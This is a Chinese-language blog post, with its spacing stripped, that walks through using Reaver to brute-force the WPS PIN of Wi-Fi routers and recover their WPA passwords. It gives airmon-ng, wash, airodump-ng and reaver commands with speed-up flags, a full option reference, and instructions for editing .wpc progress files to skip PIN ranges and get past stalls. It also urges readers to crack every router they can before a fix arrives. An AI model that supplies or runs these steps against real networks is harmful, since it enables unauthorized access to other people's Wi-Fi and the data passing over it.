Reaver基本命令参数详解及应用

Reaver基本命令参数详解及应用2012-10-0416:39:16|分类：PC_net|字号订阅Reaver基本命令参数XiaoPanOS下：选择“终端”输入sudothunar这里是为了取得超级权限，选择系统文件-usr-local-ect-reaveifconfig–a//确认你用哪一个网卡WLAN0或WLAN1airmon-ngstartwlan0//开启监听模式wash–imon0–C//查看开启wps的无线路由器airodump-ngmon0//查看周边AP信息（抓包）reaver–imon0–bMAC–a–S–vv–d3–t3//开始穷举PIN码reaver–imon0–bMAC–a–S–vv–d0//加快速度为1秒reaver–imon0–bMAC–a–S–vv–pxxxx//从前4位PIN码开始reave的进度表文件保存在:1.3版：/etc/reaver/MAC地址.wpc1.4版：/usr/local/etc/reaver/MAC地址.wpcCDliunx下：选择“终端”输入sudothunar这里是为了取得超级权限，选择系统文件-usr-local-ect-reaver-reaver必需的参数:-i,--interface=wlanNameofthemonitor-modeinterfacetouse//监视模式接口使用的名称-b,--bssid=macBSSIDofthetargetAP//目标AP的SSIDreaver可选参数:-m,--mac=macMACofthehostsystem//主机系统的MAC-e,--essid=ssidESSIDofthetargetAP//目标AP的ESSID-c,--channel=channelSetthe802.11channelfortheinterface(implies-f)//设置接口的802.11信道(意味着-f)-o,--out-file=fileSendoutputtoalogfile[stdout]//输出发送到一个日志文件-s,--session=fileRestoreaprevioussessionfile//恢复以前的记录文件-C,--exec=commandExecutethesuppliedcommanduponsuccessfulpinrecovery//所提供的命令执行成功后，pin恢复-D,--daemonizeDaemonizereaver//守护进程reaver-a,--autoAutodetectthebestadvancedoptionsforthetargetAP//自动检测目标AP的最先进的选项-f,--fixedDisablechannelhopping//禁用信道跳频-5,--5ghzUse5GHz802.11channels//使用5GHz的802.11信道-v,--verboseDisplaynon-criticalwarnings(-vvformore)//显示非关键的警告（-VV更多）-q,--quietOnlydisplaycriticalmessages//仅显示重要消息-h,--helpShowhelp//显示帮助reaver高级选项：-p,--pin=wpspinUsethespecified4or8digitWPSpin//使用指定的4个或8个的pinWPS-d,--delay=secondsSetthedelaybetweenpinattempts[1]//设置pin尝试之间的延迟[1]-l,--lock-delay=secondsSetthetimetowaitiftheAPlocksWPSpinattempts[60]//设置等待的时间，如果AP锁定WPSPIN尝试[60]-g,--max-attempts=numQuitafternumpinattempts//退出后NUMpin尝试-x,--fail-wait=secondsSetthetimetosleepafter10unexpectedfailures[0]//设定时间后进入休眠10[0]意外故障-r,--recurring-delay=xySleepforysecondseveryxpinattempts//对每一个pin码尝试Y秒-t,--timeout=secondsSetthereceivetimeoutperiod[5]//设置接收超时时间[5]-T,--m57-timeout=secondsSettheM5M7timeoutperiod[0.20]//设置M5M7超时期[0.20]-A,--no-associateDonotassociatewiththeAP(associationmustbedonebyanotherapplication)//不要与AP关联（协会必须由另一个应用程序进行）-N,--no-nacksDonotsendNACKmessageswhenoutoforderpacketsarereceived//不要发送NACK消息收到时，为了包出-S,--dh-smallUsesmallDHkeystoimprovecrackspeed//使用小DH密钥，以提高PJ速度-L,--ignore-locksIgnorelockedstatereportedbythetargetAP//忽略锁定状态的目标AP-E,--eap-terminateTerminateeachWPSsessionwithanEAPFAILpacket//终止每一个EAP失败包WPS的记录-n,--nackTargetAPalwayssendsaNACK[Auto]//目标AP发送一个NACK[自动]-w,--win7MimicaWindows7registrar[False]//模仿Windows7的注册处处长[虚假]reaver使用方法和技巧:reaver使用方法:reaver-imon0-bxx:xx:xx:xx:xx-a-S-vv-c频道-i监听后接口名称-b目标mac地址-a自动检测目标AP最佳配置-S使用最小的DHkey，可以提高PJ速度-vv显示更多的非严重警告-d即delay每穷举一次的闲置时间预设为1秒-c频道-pPIN码四位或八位//可以用8位直接找到密码。当出现有百分数时你就可以用crtl+c来暂停，它会将reaver的进度表文件保存在1.3版：/etc/reaver/MAC地址.wpc1.4版：/usr/local/etc/reaver/MAC地址.wpc(tmp/minidwep/MAC地址.wpc)用资源管理器，手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中，下次重启动后，再手工复制到/etc/reaver/目录下即可。注意需要取得ROOT权限,才可将wpc文件复制到/etc/reaver/目录下:在终端模拟里面输入:SUDOSUSUDOTHUNARreaver使用技巧:1、将mac地址.wpc备份后，下次可以继续使用。2、程序默认每尝试后停止一秒，加入-d0参数使之不停止：reaver-imon0-bC8:3A:35:F6:BB:B8-vv-d03、-p参数：-pPIN可以让你在获取到PIN的情况下直接得到路由WPA密码！reaver-imon0-bMAC-pPIN4、wpc结构0//这个地方是说它的前4位PIN码的进度位置数，真实位置要+40//这个地方是说后3位PIN数的已经运行测试位置数0//0时没有找到，当为1时找到前四位，当为2时全部找到。下面是1万个前四位数（reaver1.3版4位随机数，1.4版是升序）第4行起00000001..9999下面是1千个三位数（PIN第八位数是验证码）从1004行起000..999所以前四位很重要，将已经知道的前四位放在最前面会提高你的PIN速度，我们也可以手动修改wpc文件第一行，如我们要从3000开始pin你可以将它修改为3004,这样它就会从3000开始PIN了。当我们在PIN时就可以不用保存虚拟机快照了，只要你记住了前四位，你下载用软件修改WPC文件就可了。cdlinux对wpc文件最方便，beini和xiaopan对wpc修改要用命令vi来修改，vi的使用方法很简单viXXXX.wpc打开就可以了，输入i进行编辑，输入escap退回命令模式，输入:wq退出保存。Pin码重复出现死循环解决之道:1.xiaopanOS环境解决之道：当你看到PIN到一定程度，窗口里的PIN码不变、进度百分比也不走，那么，保持原窗口不变，再点击ROOTSHELL图标，新开一个PIN窗口，输入“reaver-imon0-b（正在PIN的目标MAC）-a-s-vv”(注意：这里“S”要小写)那么，你就会发现原来PIN的窗口，PIN码开始改变，进度开始前进了！而且PIN的时间也大为缩短了！如果是破解到99.99%，执行此部操作就马上弹出正确的pin码和wifi密码，以及路由器的SSID。2.CDlinux环境解决之道：当你看到PIN到一定程度，窗口里的PIN码不变、进度百分比也不走，那么，请Ctrl+C停止，然后点击[Reaver]按钮，在弹出的窗口中输入“-a-s–vv“(注意：这里“S”要小写)那么，你就会发现原来PIN的窗口，PIN码开始改变，进度开始前进了！而且PIN的时间也大为缩短了！,如果是破解到99.99%，执行此部操作就马上弹出正确的pin码和wifi密码，以及路由器的SSID。若到90.9%或99.9%还是不出，也可以试试“reaver-imon0-b(正在PIN的目标MAC)-v-a-n[-c]”时间及经验总结，基本90.9%和99.9%的死循环，已经100%成功了，最后祝大家破解愉快！用Reaverpin码破特点：1、不需要客户端，2、有PIN码就能获得无线密码，3、八位数PIN码实际只有一万一千组随机密码，4、抓包、EWSA跑包，每个环节都有很大的不确定性。而PIN破密，只要开户WPS，破密只是个时间问题。提醒：大家还是早点都把能pin的路由都破了！可能马上就有安全补救方案出来了！到时候就没机会了，时不我待、只争朝夕！BT5、CDlinux、beini、xiaopan-OS都支持reaver运行。reaver使用方法、步骤：打开超级终端rootshell如果电脑装有多个无线网卡，请先发指令ifconfig-a确认你用哪一个网卡WLAN0或WLAN1下面的指令都是以单一网卡WLAN0为例一、激活监听模式：airmon-ngstartwlan0二、查看周边AP信息（抓包）：airodump-ngmon0观察要破AP的PWR信号强弱变化，注意同频干扰，调整网卡放置位置和角度、方向。PWR小于-75基本上会Timeout,PWR-60左右,则非常顺畅(2-6秒攻击一次)三、按Ctrl+C终止抓包四、抓PIN码：reaver-imon0-bMAC-vv例如：reaver-imon0-bC8:3A:35:F6:BB:B8–vv1.4版可用：reaver-imon0-bC8:3A:35:F6:BB:B8-v（可用一个v）注意，MAC中冒号不可省略，MAC地址的字母大小写均可，-vv是两个V不是W！reaver1.3感觉比1.4更稳定些。特别提示：只有AP开启了WPS、QSS功能，才可以用PIN法破PSK密码!如何查看AP是否开了WPS、QSS呢？一、使用指令:airodump-ngmon0MB一栏下，出现54e.（看清楚有点“.”）是开WPS的二、WIN7下，用通常的方式连接AP，如果在提示输入密码框下面，出现“通过按路由器按钮也可以连接”，就确认此AP开了WPS、QSS。但是，WIN7下不出现“通过按路由器按钮也可以连接”，不等于100%没开WPS。还是54e.准。AP关闭了WPS、或者没有QSS滴，会出现“WARNING:FailedtoassociatewithXX:XX:XX:XX:XX:XX(ESSID:XXXX)”PIN